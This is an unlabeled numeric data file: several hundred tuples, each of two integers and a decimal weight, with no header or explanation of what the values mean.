(290, 110095, 0.86331),
(248, 110097, 0.84),
(257, 110097, 0.84),
(269, 110097, 0.84),
(306, 110097, 0.84),
(248, 110098, 0.93331),
(257, 110098, 0.93331),
(240, 113321, 0.14),
(241, 113321, 0.14),
(274, 113321, 0.14),
(292, 113321, 0.14),
(304, 113321, 0.14),
(174, 113321, 0.28),
(259, 113321, 0.42),
(260, 113321, 0.42),
(246, 115031, 0.95669),
(256, 115031, 0.95669),
(256, 115048, 0.37331),
(259, 115048, 0.37331),
(260, 115048, 0.37331),
(262, 115048, 0.37331),
(287, 115048, 0.37331),
(246, 115051, 0.81669),
(256, 115051, 0.81669),
(292, 115051, 0.81669),
(306, 115051, 0.81669),
(256, 115598, 0.46669),
(263, 115598, 0.46669),
(241, 116052, 0.86331),
(242, 116052, 0.86331),
(305, 116052, 0.86331),
(299, 116052, 1.72662),
(241, 116069, 0.84),
(269, 116069, 0.84),
(290, 116069, 0.84),
(242, 116069, 1.68),
(241, 116071, 0.88669),
(242, 116071, 0.88669),
(240, 117262, 0.88669),
(243, 117262, 0.88669),
(247, 117262, 0.88669),
(242, 117262, 1.77338),
(248, 117262, 1.77338),
(240, 117263, 0.95669),
(242, 117263, 0.95669),
(240, 146932, 0.88669),
(263, 146932, 0.88669),
(240, 146945, 1.05),
(269, 146945, 1.05),
(240, 146970, 0.91),
(244, 146970, 0.91),
(178, 146976, 0.84),
(240, 146976, 0.84),
(247, 146976, 0.84),
(262, 146980, 0.93331),
(240, 146980, 1.86662),
(240, 148285, 0.98),
(273, 148285, 0.98),
(242, 149052, 0.88669),
(259, 149052, 0.88669),
(260, 149052, 0.88669),
(242, 149053, 0.95669),
(259, 149053, 0.95669),
(260, 149053, 0.95669),
(178, 149059, 0.18669),
(242, 149059, 0.18669),
(243, 149059, 0.18669),
(275, 149059, 0.18669),
(288, 149059, 0.18669),
(168, 157071, 0.86331),
(243, 157071, 0.86331),
(248, 157071, 0.86331),
(263, 157071, 0.86331),
(288, 157071, 0.86331),
(305, 157071, 0.86331),
(168, 157072, 0.98),
(243, 157072, 0.98),
(248, 157072, 0.98),
(263, 157072, 0.98),
(288, 157072, 0.98),
(305, 157072, 0.98),
(243, 157083, 0.95669),
(261, 157083, 0.95669),
(243, 157085, 0.37331),
(249, 157085, 0.37331),
(243, 157099, 0.95669),
(261, 157099, 0.95669),
(262, 157099, 0.95669),
(264, 157099, 0.95669),
(243, 157100, 1.02669),
(261, 157100, 1.02669),
(174, 157101, 0.86331),
(267, 157101, 0.86331),
(243, 157101, 1.72662),
(174, 157102, 0.95669),
(243, 157102, 0.95669),
(243, 157103, 0.95669),
(267, 157103, 0.95669),
(243, 157105, 0.88669),
(263, 157105, 0.88669),
(243, 157106, 1.00331),
(263, 157106, 1.00331),
(178, 157992, 0.23331),
(243, 157992, 0.23331),
(245, 157992, 0.23331),
(248, 157992, 0.23331),
(274, 157992, 0.23331),
(292, 157992, 0.23331),
(258, 157992, 5.83275),
(243, 157993, 0.91),
(245, 157993, 0.91),
(258, 157993, 0.91),
(243, 157995, 0.09331),
(249, 157995, 0.09331),
(290, 157995, 0.18662),
(174, 159038, 0.91),
(241, 159038, 0.91),
(241, 159058, 0.91),
(258, 159058, 0.91),
(265, 159058, 0.91),
(266, 159058, 0.91),
(288, 159058, 0.91),
(241, 159061, 0.98),
(247, 159061, 0.98),
(178, 159772, 0.91),
(241, 159772, 0.91),
(275, 159772, 0.91),
(258, 163136, 1.07331),
(264, 163136, 1.07331),
(248, 163137, 0.95669),
(258, 163137, 0.95669),
(258, 163146, 0.28),
(262, 163146, 0.28),
(305, 163146, 0.28),
(267, 163146, 0.56),
(272, 163146, 0.56),
(280, 163146, 0.56),
(244, 163150, 0.88669),
(258, 163150, 0.88669),
(178, 163710, 0.88669),
(248, 163710, 0.88669),
(274, 163710, 0.88669),
(292, 163710, 0.88669),
(258, 163710, 15.0737),
(248, 163713, 0.98),
(274, 163713, 0.98),
(292, 163713, 0.98),
(258, 163713, 12.74),
(178, 168453, 0.81669),
(242, 168453, 0.81669),
(261, 168456, 0.95669),
(262, 168456, 0.95669),
(264, 168456, 0.95669),
(242, 168456, 2.87007),
(242, 168498, 0.86331),
(275, 168498, 0.86331),
(242, 168499, 0.98),
(275, 168499, 0.98),
(259, 173352, 2.58993),
(260, 173352, 2.58993),
(259, 173353, 3.21993),
(260, 173353, 3.21993),
(259, 173354, 1.07331),
(260, 173354, 1.07331),
(261, 173354, 1.07331),
(246, 173355, 0.91),
(259, 173355, 0.91),
(260, 173355, 0.91),
(259, 173356, 0.86331),
(260, 173356, 0.86331),
(259, 173357, 0.93331),
(260, 173357, 0.93331),
(259, 173358, 0.95669),
(260, 173358, 0.95669),
(259, 173359, 1.05),
(260, 173359, 1.05),
(259, 173360, 0.88669),
(260, 173360, 0.88669),
(259, 173361, 1.00331),
(260, 173361, 1.00331),
(259, 173362, 0.42),
(260, 173362, 0.42),
(259, 173363, 0.98),
(260, 173363, 0.98),
(259, 173364, 1.14331),
(260, 173364, 1.14331),
(259, 173365, 1.05),
(260, 173365, 1.05),
(259, 173366, 1.21331),
(260, 173366, 1.21331),
(259, 173367, 1.02669),
(260, 173367, 1.02669),
(290, 173367, 1.02669),
(259, 173368, 1.05),
(260, 173368, 1.05),
(259, 173369, 1.12),
(260, 173369, 1.12),
(259, 173370, 1.00331),
(260, 173370, 1.00331),
(259, 173371, 1.91338),
(260, 173371, 1.91338),
(259, 173372, 1.09669),
(260, 173372, 1.09669),
(259, 173373, 1.12),
(260, 173373, 1.12),
(259, 173374, 0.98),
(260, 173374, 0.98),
(305, 173374, 0.98),
(259, 173375, 1.12),
(260, 173375, 1.12),
(259, 173376, 0.95669),
(260, 173376, 0.95669),
(259, 173377, 1.05),
(260, 173377, 1.05),
(259, 173378, 1.02669),
(260, 173378, 1.02669),
(259, 173379, 1.09669),
(260, 173379, 1.09669),
(178, 173380, 0.23331),
(265, 173380, 0.23331),
(266, 173380, 0.23331),
(304, 173380, 0.23331),
(305, 173380, 0.23331),
(259, 173380, 0.69993),
(260, 173380, 0.69993),
(259, 173381, 1.82),
(260, 173381, 1.82),
(259, 173382, 2.00662),
(260, 173382, 2.00662),
(259, 173383, 0.91),
(260, 173383, 0.91),
(259, 173384, 1.02669),
(260, 173384, 1.02669),
(259, 173385, 1.12),
(260, 173385, 1.12),
(259, 173386, 1.33),
(260, 173386, 1.33),
(259, 173890, 0.88669),
(260, 173890, 0.88669),
(259, 173891, 1.00331),
(260, 173891, 1.00331),
(259, 173892, 0.37331),
(260, 173892, 0.37331),
(259, 173893, 1.00331),
(260, 173893, 1.00331),
(259, 173894, 1.23669),
(260, 173894, 1.23669),
(246, 175585, 0.86331),
(261, 175585, 0.86331),
(244, 176563, 0.23331),
(269, 176563, 0.23331),
(245, 178567, 1.02669),
(248, 178567, 1.02669),
(174, 178932, 0.28),
(245, 178932, 0.28),
(246, 178932, 0.28),
(272, 178932, 0.28),
(280, 178932, 0.28),
(246, 182256, 0.81669),
(262, 182256, 0.81669),
(174, 185402, 0.86331),
(262, 185402, 1.72662),
(160, 189286, 7.02981),
(160, 189287, 8.73981),
(161, 189351, 0.51331),
(161, 189352, 1.16669),
(161, 189353, 1.26),
(161, 189354, 0.28),
(161, 189355, 1.05),
(161, 189356, 1.09669),
(161, 189357, 0.23331),
(161, 189358, 0.88669),
(161, 189359, 1.21331),
(161, 189360, 0.23331),
(161, 189361, 0.95669),
(161, 189362, 1.09669),
(161, 189363, 0.51331),
(161, 189364, 1.07331),
(161, 189365, 1.23669),
(161, 189366, 0.28),
(161, 189367, 1.02669),
(161, 189368, 1.23669),
(161, 189369, 1.05),
(161, 189370, 1.26),
(161, 189371, 0.23331),
(161, 189372, 0.98),
(161, 189373, 1.26),
(161, 189374, 0.60669),
(161, 189375, 1.09669),
(161, 189376, 1.4),
(161, 189377, 0.32669),
(161, 189378, 1.12),
(161, 189379, 1.21331),
(161, 189380, 0.37331),
(161, 189381, 1.07331),
(161, 189382, 1.23669),
(161, 189383, 0.95669),
(161, 189384, 1.09669),
(161, 189385, 0.95669),
(161, 189386, 1.19),
(161, 189387, 0.65338),
(161, 189388, 1.07331),
(161, 189389, 1.16669),
(161, 189390, 0.93331),
(161, 189391, 1.09669),
(161, 189821, 0.46669),
(161, 189822, 1.02669),
(161, 189823, 1.14331),
(161, 189824, 0.46669),
(161, 189825, 1.23669),
(161, 189826, 1.4),
(161, 189827, 0.32669),
(161, 189828, 0.93331),
(161, 189829, 1.12),
(161, 189830, 1.00331),
(161, 189831, 1.16669),
(178, 190549, 0.86331),
(193, 190549, 0.86331),
(292, 190549, 0.86331),
(168, 190582, 0.42),
(193, 190582, 0.42),
(272, 190582, 0.42),
(275, 190582, 0.42),
(280, 190582, 0.42),
(178, 192537, 0.86331),
(246, 192537, 0.86331),
(246, 192545, 1.02669),
(247, 192545, 1.02669),
(246, 192547, 0.42),
(272, 192547, 0.42),
(280, 192547, 0.42),
(246, 192558, 0.88669),
(274, 192558, 0.88669),
(304, 192558, 0.88669),
(246, 193044, 0.93331),
(272, 193044, 0.93331),
(280, 193044, 0.93331),
(168, 197685, 1.00331),
(168, 197686, 1.09669),
(168, 197687, 1.00331),
(168, 197688, 0.98),
(168, 197689, 0.98),
(168, 197690, 1.05),
(168, 197691, 0.86331),
(168, 197692, 0.98),
(168, 197693, 0.93331),
(168, 197694, 0.98),
(168, 197695, 0.91),
(168, 197696, 1.02669),
(168, 197697, 1.09669),
(168, 197698, 0.91),
(168, 197699, 1.09669),
(168, 197700, 0.88669),
(168, 197701, 1.00331),
(168, 197702, 0.42),
(168, 197703, 1.00331),
(168, 197704, 1.19),
(168, 197705, 0.18669),
(168, 197706, 0.88669),
(168, 197707, 1.00331),
(168, 197708, 0.28),
(168, 197709, 0.91),
(168, 197710, 1.00331),
(168, 197711, 0.98),
(272, 197711, 0.98),
(280, 197711, 0.98),
(168, 197712, 1.07331),
(168, 197713, 0.37331),
(265, 197713, 0.37331),
(266, 197713, 0.37331),
(268, 197713, 0.37331),
(290, 197713, 0.37331),
(168, 197714, 1.09669),
(168, 197715, 1.33),
(168, 197716, 0.28),
(168, 197717, 0.91),
(168, 197718, 1.02669),
(168, 198319, 0.95669),
(168, 198320, 1.07331),
(168, 198321, 0.88669),
(168, 198322, 0.98),
(174, 215065, 2.14662),
(174, 215066, 1.14331),
(174, 215067, 1.16669),
(174, 215068, 0.98),
(174, 215069, 0.88669),
(174, 215070, 1.00331),
(174, 215071, 0.93331),
(174, 215072, 1.02669),
(174, 215073, 0.86331),
(174, 215074, 1.09669),
(174, 215075, 1.07331),
(174, 215076, 1.21331),
(174, 215077, 1.12),
(174, 215078, 1.09669),
(174, 215079, 1.09669),
(174, 215080, 1.16669),
(174, 215081, 0.93331),
(174, 215082, 1.05),
(174, 215083, 1.00331),
(174, 215084, 1.09669),
(174, 215085, 0.14),
(174, 215086, 0.88669),
(174, 215087, 0.95669),
(174, 215088, 0.91),
(174, 215089, 1.05),
(174, 215090, 0.95669),
(174, 215091, 1.07331),
(174, 215092, 0.46669),
(174, 215093, 1.14331),
(174, 215094, 1.21331),
(174, 215095, 0.93331),
(174, 215096, 1.05),
(174, 215097, 1.05),
(174, 215098, 0.93331),
(174, 215099, 0.95669),
(174, 215100, 1.00331),
(174, 215101, 1.02669),
(174, 215102, 0.95669),
(174, 215103, 1.09669),
(174, 215104, 0.88669),
(174, 215105, 1.19),
(174, 215976, 0.95669),
(174, 215977, 1.07331),
(174, 215978, 2.05338),
(306, 215978, 2.05338),
(174, 215979, 1.19),
(174, 215980, 1.14331),
(306, 215980, 1.14331),
(174, 215981, 4.26688),
(174, 215982, 9.30981),
(174, 215983, 1.00331),
(174, 215984, 1.12),
(262, 217114, 1.00331),
(270, 217114, 1.00331),
(301, 217114, 1.00331),
(262, 217138, 0.23331),
(272, 217138, 0.23331),
(178, 221392, 0.18669),
(178, 221393, 0.95669),
(178, 221394, 1.02669),
(178, 221395, 1.49352),
(178, 221396, 0.88669),
(178, 221397, 1.02669),
(178, 221398, 0.91),
(178, 221399, 0.98),
(178, 221400, 0.93331),
(178, 221401, 1.16669),
(178, 221402, 2.58993),
(178, 221403, 0.91),
(178, 221404, 1.09669),
(178, 221405, 1.12),
(178, 221406, 0.93331),
(178, 221407, 1.05),
(178, 221408, 0.86331),
(178, 221409, 0.93331),
(178, 221410, 0.28),
(178, 221411, 1.09669),
(178, 221412, 1.26),
(178, 221413, 0.93331),
(178, 221414, 0.98),
(178, 221415, 0.37338),
(178, 221416, 0.86331),
(178, 221417, 1.14331),
(178, 221418, 0.86331),
(178, 221419, 0.93331),
(178, 221420, 0.56),
(178, 221421, 0.91),
(178, 221422, 1.00331),
(178, 221423, 0.95669),
(178, 221424, 0.91),
(178, 221425, 0.98),
(178, 221426, 0.93331),
(178, 221427, 0.98),
(178, 221428, 1.09669),
(178, 221429, 1.96),
(178, 221430, 1.07331),
(178, 221431, 1.09669),
(178, 221432, 0.86331),
(178, 221433, 0.95669),
(178, 221434, 0.91),
(178, 221435, 0.93331),
(178, 221436, 0.95669),
(178, 221437, 0.98),
(178, 221438, 1.09669),
(178, 221439, 0.98),
(178, 221440, 0.84),
(178, 221441, 1.05),
(178, 221442, 0.91),
(178, 221443, 0.23331),
(270, 221443, 0.23331),
(301, 221443, 0.23331),
(178, 221444, 0.93331),
(178, 221445, 1.02669),
(178, 221446, 1.12),
(178, 221447, 1.00331),
(178, 221448, 1.09669),
(178, 221449, 0.93331),
(178, 221450, 1.05),
(178, 221451, 1.07331),
(178, 221452, 1.14331),
(178, 221453, 1.05),
(178, 221454, 0.95669),
(178, 221455, 1.05),
(178, 221456, 0.98),
(178, 221457, 1.09669),
(178, 221458, 0.93331),
(178, 221459, 0.98),
(178, 221460, 0.93331),
(178, 221461, 0.98),
(178, 221462, 1.05),
(178, 221463, 1.14331),
(178, 221464, 1.82),
(178, 221465, 0.95669),
(178, 221466, 1.00331),
(178, 221467, 0.88669),
(178, 221468, 1.02669),
(178, 221469, 0.93331),
(178, 221470, 1.07331),
(178, 221471, 0.93331),
(178, 221472, 1.05),
(178, 221473, 0.28),
(178, 221474, 0.98),
(178, 221475, 1.09669),
(178, 221476, 0.88669),
(178, 221477, 0.98),
(178, 221478, 0.91),
(178, 221479, 1.05),
(178, 221480, 0.86331),
(178, 221481, 1.05),
(178, 221482, 0.28),
(178, 221483, 1.05),
(178, 221484, 1.14331),
(178, 221485, 0.88669),
(178, 221486, 0.95669),
(178, 221487, 0.95669),
(178, 221488, 0.86331),
(178, 221489, 0.98),
(178, 221490, 0.86331),
(288, 221490, 0.86331),
(178, 221491, 0.95669),
(178, 221492, 0.95669),
(178, 221493, 1.02669),
(178, 221494, 0.28),
(178, 221495, 0.95669),
(178, 221496, 1.02669),
(178, 221497, 0.32669),
(178, 221498, 0.93331),
(178, 221499, 1.02669),
(178, 221500, 1.05),
(178, 221501, 1.16669),
(178, 221502, 1.00331),
(178, 221503, 2.05338),
(178, 221504, 1.09669),
(178, 221505, 0.88669),
(178, 221506, 0.98),
(178, 221507, 0.37331),
(178, 221508, 1.02669),
(178, 221509, 1.12),
(178, 221510, 1.16669),
(178, 221511, 1.09669),
(178, 221512, 0.88669),
(178, 221513, 1.02669),
(178, 221514, 0.84),
(178, 221515, 0.91),
(178, 221516, 1.00331),
(178, 221517, 1.00331),
(178, 223074, 0.28),
(178, 223075, 0.95669),
(178, 223076, 1.02669),
(178, 223077, 0.98),
(178, 223078, 0.98),
(247, 228901, 1.07331),
(248, 228901, 2.14662),
(248, 233393, 0.28),
(269, 233393, 0.28),
(274, 233393, 0.28),
(193, 238287, 0.86331),
(193, 238288, 0.98),
(193, 238289, 0.95669),
(193, 238290, 1.21331),
(193, 238291, 0.98),
(193, 238292, 0.93331),
(193, 238293, 0.91),
(193, 238294, 1.00331),
(193, 238295, 1.07331),
(193, 238296, 0.98),
(193, 238297, 1.05),
(193, 238298, 0.95669),
(193, 238299, 1.07331),
(193, 238300, 1.09669),
(193, 238301, 0.98),
(193, 238302, 1.07331),
(193, 238303, 0.93331),
(193, 238304, 0.95669),
(193, 238305, 0.98),
(193, 238306, 1.09669),
(193, 238307, 1.00331),
(193, 238308, 1.21331),
(193, 238309, 0.95669),
(193, 238310, 1.02669),
(193, 238311, 0.95669),
(193, 238312, 1.09669),
(193, 238313, 0.98),
(274, 238313, 0.98),
(193, 238314, 1.05),
(193, 238315, 1.09669),
(193, 238316, 0.95669),
(193, 238317, 1.05),
(193, 238318, 1.07331),
(193, 238319, 1.02669),
(193, 238320, 1.00331),
(193, 238321, 1.09669),
(193, 238322, 0.14),
(306, 238322, 0.14),
(193, 238323, 0.91),
(193, 238324, 1.05),
(193, 238325, 0.88669),
(193, 238326, 1.02669),
(193, 238327, 1.02669),
(193, 238328, 1.00331),
(193, 238329, 1.12),
(193, 238330, 0.98),
(193, 238331, 1.07331),
(193, 238332, 0.28),
(193, 238333, 0.95669),
(193, 238334, 1.07331),
(193, 238335, 1.12),
(193, 238336, 1.19),
(193, 238337, 0.93331),
(193, 238338, 1.05),
(193, 238339, 0.93331),
(193, 238340, 1.00331),
(193, 238341, 0.98),
(193, 238342, 1.05),
(193, 238343, 0.95669),
(193, 238344, 1.02669),
(193, 238345, 1.07331),
(193, 238346, 1.14331),
(193, 238347, 0.95669),
(193, 238348, 1.23669),
(193, 238349, 0.98),
(193, 238350, 1.14331),
(193, 238351, 0.95669),
(193, 238352, 1.05),
(193, 238353, 1.02669),
(193, 238354, 1.12),
(193, 238355, 1.02669),
(193, 238356, 1.16669),
(193, 238357, 3.00993),
(193, 238358, 1.19),
(193, 238359, 1.07331),
(193, 238360, 1.12),
(193, 238361, 1.05),
(193, 238362, 0.98),
(193, 238363, 1.07331),
(193, 238364, 2.00662),
(193, 238365, 2.24),
(193, 238366, 1.00331),
(193, 238367, 1.12),
(193, 238368, 1.14331),
(193, 238369, 1.26),
(193, 238370, 1.07331),
(193, 238371, 1.19),
(193, 238372, 1.12),
(193, 238373, 1.19),
(193, 238374, 4.08),
(193, 238375, 1.30669),
(193, 238376, 1.09669),
(193, 238377, 1.30669),
(193, 238378, 1.00331),
(193, 238379, 1.09669),
(193, 238380, 1.96),
(193, 238381, 1.09669),
(193, 238382, 1.09669),
(193, 238383, 0.95669),
(193, 238384, 1.00331),
(193, 238385, 2.00662),
(193, 238386, 1.05),
(193, 238387, 1.09669),
(193, 238388, 1.00331),
(193, 238389, 1.14331),
(193, 238390, 0.95669),
(193, 238391, 0.28),
(193, 238392, 1.07331),
(193, 238393, 1.23669),
(193, 238394, 1.07331),
(193, 238395, 1.35331),
(193, 238396, 1.02669),
(193, 238397, 1.12),
(193, 238398, 0.81669),
(193, 238399, 0.95669),
(193, 238400, 0.91),
(193, 238401, 1.05),
(193, 239532, 0.37331),
(193, 239533, 0.95669),
(193, 239534, 1.05),
(193, 239535, 1.12),
(193, 239536, 0.93331),
(193, 239537, 1.02669),
(193, 239538, 0.91),
(193, 239539, 0.98),
(193, 239540, 1.09669),
(193, 239541, 1.21331),
(193, 239542, 0.91),
(193, 239543, 1.09669),
(268, 247403, 0.91),
(274, 247403, 0.91),
(268, 247404, 0.98),
(274, 247404, 0.98),
(270, 250391, 0.46669),
(301, 250391, 0.46669),
(270, 250392, 0.98),
(301, 250392, 0.98),
(270, 250393, 1.07331),
(301, 250393, 1.07331),
(270, 250394, 0.28),
(301, 250394, 0.28),
(270, 250395, 1.00331),
(301, 250395, 1.00331),
(270, 250396, 1.09669),
(301, 250396, 1.09669),
(270, 250397, 0.93331),
(301, 250397, 0.93331),
(270, 250398, 1.02669),
(301, 250398, 1.02669),
(270, 250399, 0.86331),
(301, 250399, 0.86331),
(270, 250400, 0.95669),
(301, 250400, 0.95669),
(270, 250401, 0.95669),
(301, 250401, 0.95669),
(270, 250402, 1.16669),
(301, 250402, 1.16669),
(270, 250403, 0.98),
(301, 250403, 0.98),
(270, 250404, 1.07331),
(301, 250404, 1.07331),
(270, 250405, 1.16669),
(301, 250405, 1.16669),
(270, 250406, 0.98),
(301, 250406, 0.98),
(270, 250407, 1.05),
(301, 250407, 1.05),
(270, 250408, 1.09669),
(301, 250408, 1.09669),
(270, 250409, 1.14331),
(301, 250409, 1.14331),
(270, 250410, 1.35331),
(301, 250410, 1.35331),
(270, 250411, 0.88669),
(301, 250411, 0.88669),
(270, 250412, 1.07331),
(301, 250412, 1.07331),
(270, 250413, 0.81669),
(301, 250413, 0.81669),
(270, 250414, 0.98),
(301, 250414, 0.98),
(270, 250415, 0.91),
(301, 250415, 0.91),
(270, 250416, 0.98),
(301, 250416, 0.98),
(270, 250704, 0.28),
(301, 250704, 0.28),
(270, 250705, 0.91),
(301, 250705, 0.91),
(270, 250706, 1.02669),
(301, 250706, 1.02669),
(265, 250985, 0.98),
(266, 250985, 0.98),
(265, 250986, 1.05),
(266, 250986, 1.05),
(265, 250987, 0.84),
(266, 250987, 0.84),
(265, 250988, 0.93331),
(266, 250988, 0.93331),
(265, 250989, 1.02669),
(266, 250989, 1.02669),
(265, 250990, 1.21331),
(266, 250990, 1.21331),
(265, 250991, 1.02669),
(266, 250991, 1.02669),
(265, 250992, 1.09669),
(266, 250992, 1.09669),
(265, 250993, 0.42),
(266, 250993, 0.42),
(265, 250994, 1.02669),
(266, 250994, 1.02669),
(265, 250995, 1.12),
(266, 250995, 1.12),
(265, 250996, 0.98),
(266, 250996, 0.98),
(265, 250997, 1.07331),
(266, 250997, 1.07331),
(265, 250998, 0.98),
(266, 250998, 0.98),
(265, 250999, 1.09669),
(266, 250999, 1.09669),
(265, 251000, 1.00331),
(266, 251000, 1.00331),
(265, 251001, 1.07331),
(266, 251001, 1.07331),
(272, 253070, 0.93331),
(280, 253070, 0.93331),
(272, 253071, 1.02669),
(280, 253071, 1.02669),
(272, 253072, 1.16669),
(280, 253072, 1.16669),
(272, 253073, 0.84),
(280, 253073, 0.84),
(272, 253074, 0.93331),
(280, 253074, 0.93331),
(272, 253075, 0.88669),
(280, 253075, 0.88669),
(272, 253076, 0.95669),
(280, 253076, 0.95669),
(272, 253077, 1.02669),
(280, 253077, 1.02669),
(272, 253078, 1.23669),
(280, 253078, 1.23669),
(272, 253079, 1.02669),
(280, 253079, 1.02669),
(272, 253080, 1.09669),
(280, 253080, 1.09669),
(272, 253081, 1.02669),
(280, 253081, 1.02669),
(272, 253082, 1.12),
(280, 253082, 1.12),
(272, 253083, 0.98),
(280, 253083, 0.98),
(272, 253084, 1.07331),
(280, 253084, 1.07331),
(272, 253085, 1.09669),
(280, 253085, 1.09669),
(272, 253086, 0.37331),
(280, 253086, 0.37331),
(272, 253087, 1.00331),
(280, 253087, 1.00331),
(272, 253088, 1.09669),
(280, 253088, 1.09669),
(272, 253089, 0.88669),
(280, 253089, 0.88669),
(272, 253090, 0.98),
(280, 253090, 0.98),
(272, 253091, 0.46669),
(280, 253091, 0.46669),
(272, 253092, 1.02669),
(280, 253092, 1.02669),
(272, 253093, 1.09669),
(280, 253093, 1.09669),
(272, 253094, 1.09669),
(280, 253094, 1.09669),
(272, 253095, 0.98),
(280, 253095, 0.98),
(272, 253096, 1.19),
(280, 253096, 1.19),
(272, 253099, 1.02669),
(280, 253099, 1.02669),
(272, 253100, 1.21331),
(280, 253100, 1.21331),
(272, 253101, 1.00331),
(280, 253101, 1.00331),
(272, 253102, 1.14331),
(280, 253102, 1.14331),
(272, 253103, 0.32669),
(280, 253103, 0.32669),
(272, 253104, 1.05),
(280, 253104, 1.05),
(272, 253105, 1.12),
(280, 253105, 1.12),
(272, 253106, 0.98),
(280, 253106, 0.98),
(272, 253107, 0.91),
(280, 253107, 0.91),
(272, 253108, 1.00331),
(280, 253108, 1.00331),
(272, 253109, 0.84),
(280, 253109, 0.84),
(272, 253110, 0.93331),
(280, 253110, 0.93331),
(272, 253111, 0.88669),
(280, 253111, 0.88669),
(272, 253112, 0.95669),
(280, 253112, 0.95669),
(272, 253636, 1.05),
(280, 253636, 1.05),
(272, 253637, 0.32669),
(280, 253637, 0.32669),
(272, 253638, 0.93331),
(280, 253638, 0.93331),
(272, 253639, 1.07331),
(280, 253639, 1.07331),
(273, 256124, 0.95669),
(273, 256125, 1.05),
(273, 256126, 1.02669),
(273, 256127, 1.12),
(273, 256128, 1.09669),
(273, 256129, 1.09669),
(273, 256130, 1.00331),
(273, 256131, 0.91),
(273, 256132, 1.00331),
(273, 256133, 1.96),
(273, 256134, 2.42662),
(273, 256135, 0.23331),
(273, 256136, 0.88669),
(273, 256137, 0.98),
(273, 256138, 0.37338),
(273, 256139, 0.86331),
(273, 256140, 0.95669),
(273, 256141, 0.88669),
(273, 256142, 0.93331),
(273, 256143, 0.84),
(290, 256143, 0.84),
(273, 256144, 0.93331),
(273, 256145, 0.88669),
(273, 256146, 0.95669),
(273, 256147, 1.00331),
(273, 256148, 1.07331),
(273, 256551, 1.07331),
(233, 266403, 0.98),
(233, 266404, 1.02669),
(233, 266405, 1.05),
(233, 266406, 1.14331),
(233, 266407, 1.00331),
(233, 266408, 1.14331),
(233, 266409, 1.86662),
(233, 266410, 0.98),
(233, 266411, 1.02669),
(233, 266412, 0.88669),
(233, 266413, 1.00331),
(233, 266414, 1.14331),
(233, 266415, 1.02669),
(233, 266416, 1.07331),
(233, 266417, 0.98),
(233, 266418, 1.05),
(233, 266419, 1.05),
(233, 266420, 1.12),
(233, 266421, 0.98),
(233, 266422, 1.07331),
(233, 266423, 0.91),
(233, 266424, 1.00331),
(233, 266425, 1.82),
(233, 266426, 1.00331),
(233, 266427, 0.98),
(235, 267444, 0.86331),
(235, 267445, 0.93331),
(235, 267446, 3.54676),
(235, 267447, 2.94),
(235, 267448, 1.02669),
(235, 267449, 0.51331),
(235, 267450, 1.07331),
(235, 267451, 1.16669),
(235, 267452, 1.00331),
(235, 267453, 1.09669),
(235, 267454, 0.88669),
(235, 267455, 1.00331),
(235, 267456, 0.86331),
(235, 267457, 0.95669),
(235, 267458, 0.88669),
(235, 267459, 1.02669),
(235, 267460, 1.12),
(235, 267461, 1.07331),
(235, 267462, 1.05),
(235, 267463, 1.12),
(235, 267464, 0.91),
(235, 267465, 1.14331),
(235, 267466, 0.32669),
(235, 267467, 1.09669),
(235, 267468, 1.14331),
(235, 267469, 0.88669),
(235, 267470, 0.95669),
(235, 267471, 1.07331),
(235, 267472, 1.16669),
(235, 267473, 1.02669),
(235, 267474, 1.14331),
(235, 267475, 0.84),
(288, 267475, 0.84),
(235, 267476, 0.93331),
(235, 267477, 0.84),
(235, 267478, 1.00331),
(235, 267479, 1.09669),
(235, 267480, 1.91338),
(236, 268596, 0.42),
(236, 268597, 1.00331),
(236, 268598, 1.14331),
(236, 268599, 0.91),
(236, 268600, 0.98),
(236, 268601, 0.95669),
(236, 268602, 1.09669),
(236, 268603, 1.05),
(236, 268604, 1.14331),
(236, 268605, 1.33),
(236, 268606, 0.98),
(236, 268607, 1.14331),
(236, 268608, 0.42),
(236, 268609, 1.05),
(236, 268610, 1.33),
(236, 268611, 0.95669),
(236, 268612, 1.05),
(236, 269274, 0.91),
(236, 269275, 1.05),
(236, 269276, 0.98),
(236, 269277, 1.21331),
(236, 269278, 0.32669),
(236, 269279, 0.93331),
(236, 269280, 1.07331),
(237, 269472, 0.98),
(237, 269473, 1.05),
(237, 269474, 0.88669),
(237, 269475, 1.09669),
(237, 269476, 0.91),
(237, 269477, 1.00331),
(237, 269478, 1.09669),
(237, 269479, 0.91),
(237, 269480, 0.98),
(237, 269481, 1.00331),
(237, 269482, 1.19),
(237, 269483, 0.95669),
(237, 269484, 1.02669),
(237, 269485, 1.09669),
(237, 269486, 1.09669),
(237, 269487, 0.86331),
(237, 269488, 0.95669),
(237, 269489, 0.95669),
(237, 269490, 1.05),
(237, 269491, 1.07331),
(237, 269492, 1.12),
(237, 269493, 1.16669),
(237, 269494, 3.08007),
(237, 269495, 3.36),
(237, 269496, 1.02669),
(237, 269497, 1.02669),
(237, 269498, 1.16669),
(237, 269499, 0.95669),
(237, 269500, 1.12),
(237, 269501, 1.07331),
(237, 269502, 1.28331),
(237, 269503, 1.96),
(237, 269504, 1.09669),
(237, 269505, 1.07331),
(237, 269506, 0.95669),
(237, 269507, 1.00331),
(237, 269508, 0.95669),
(237, 269509, 1.05),
(237, 269510, 0.98),
(237, 269511, 1.09669),
(237, 269512, 1.09669),
(237, 269513, 1.00331),
(237, 269514, 0.95669),
(237, 269515, 1.07331),
(237, 269516, 1.02669),
(238, 270650, 0.88669),
(238, 270651, 0.95669),
(238, 270652, 1.07331),
(238, 270653, 1.07331),
(238, 270654, 0.98),
(238, 270655, 0.91),
(238, 270656, 1.02669),
(238, 270657, 0.98),
(238, 270658, 1.05),
(238, 270659, 0.93331),
(238, 270660, 0.95669),
(238, 270661, 1.05),
(238, 270662, 7.79019),
(238, 270663, 9.69),
(238, 270664, 0.93331),
(238, 270665, 1.09669),
(238, 270666, 1.00331),
(238, 270667, 1.09669),
(238, 270668, 1.02669),
(238, 270669, 1.21331),
(238, 270670, 1.02669),
(238, 270671, 1.11993),
(238, 270672, 1.09669),
(238, 270673, 1.21331),
(238, 270674, 0.95669),
(238, 270675, 1.09669),
(238, 270676, 1.00331),
(238, 270677, 1.12),
(238, 270678, 1.91338),
(238, 270679, 2.1),
(238, 270680, 1.05),
(238, 270681, 0.95669),
(238, 270682, 1.02669),
(238, 270683, 1.00331),
(238, 270684, 1.14331),
(238, 270685, 0.88669),
(238, 270686, 1.09669),
(238, 270687, 0.91),
(238, 270688, 1.07331),
(238, 270689, 0.84),
(238, 270690, 0.93331),
(238, 270691, 0.84),
(238, 270692, 0.95669),
(238, 270693, 0.91),
(238, 270694, 1.00331),
(238, 270695, 1.00331),
